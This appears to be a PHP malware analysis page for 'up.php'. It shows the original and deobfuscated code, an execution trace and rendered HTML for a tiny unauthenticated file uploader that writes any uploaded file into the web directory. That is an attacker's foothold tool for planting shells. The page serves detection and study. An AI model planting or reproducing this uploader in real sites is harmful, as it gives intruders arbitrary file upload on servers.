up.php

md5: 4aabf8a9a9c20f91ae323c3d37f03e42

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<html><?php 
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>Upload Sukses!!!<b><br><br>";
    } else {
        echo "<b>Gagal Upload!!!</b><br><br>";
    }
}
?>	
Execution traces
data/traces/4aabf8a9a9c20f91ae323c3d37f03e42_trace-1676246951.9578.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:09:37.855634]
1	0	1	0.000157	393464
1	3	0	0.000211	395776	{main}	1		/var/www/html/uploads/up.php	0	0
1	3	1	0.000271	395776
			0.000301	314200
TRACE END   [2023-02-12 22:09:37.855808]

Generated HTML code
<html><head></head><body><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>	</body></html>
Original PHP code
<html><?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>

PHP Malware Analysis

up.php

md5: 4aabf8a9a9c20f91ae323c3d37f03e42

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code